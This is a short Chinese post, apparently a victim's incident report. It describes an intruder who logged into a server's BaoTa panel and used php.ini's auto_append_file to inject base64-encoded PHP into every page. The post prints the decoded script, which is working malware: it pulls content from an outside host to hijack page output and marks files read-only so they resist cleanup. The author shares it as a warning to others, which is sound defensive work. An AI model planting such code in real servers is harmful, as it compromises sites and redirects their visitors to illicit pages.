文章描述了一起服务器安全事件,其中宝塔面板的密码被不明人士获取,该人士来自香港的IP地址。他们修改了PHP配置,利用auto_append_file在所有版本的PHP的php.ini文件中添加了base64编码的PHP脚本。解密后的脚本显示,它设置了一个无限时间限制,将服务器重定向到非法页面,可能存在数据泄露风险。作者提醒其他人检查并防范此类安全问题。
服务器宝塔密码不知道如何被人知道了,后查是香港的IP地址,此人登录宝塔后,多次修改了每个版本的PHP,将配置文件php.ini文件中,用auto_append_file,添加了base64加密的php编程语句,
后解密后,密文如下:
<?php
set_time_limit(0);
header("Content-type: text/html; charset=utf-8");
date_default_timezone_set('PRC');
$TD_server = "http://z8qw.woshinidie66.com/";
$host_name = "http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$Content_mb=file_get_contents($TD_server."/index.php?host=".$host_name."&url=".$_SERVER['QUERY_STRING']."&domain=".$_SERVER['SERVER_NAME']);
echo $Content_mb;
$url1 = $_SERVER['PHP_SELF'];
$filename1 = @end(explode('/',$url1));
function set_writeable($file_name)
{
@chmod($file_name,0444);
}
set_writeable($filename1);
?>
这人有点损。不地道。希望给其他人遇到这种情况的,提个醒,打开任何php文件,都会在底部加入这段代码,跳到他想去的非法页面地址。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
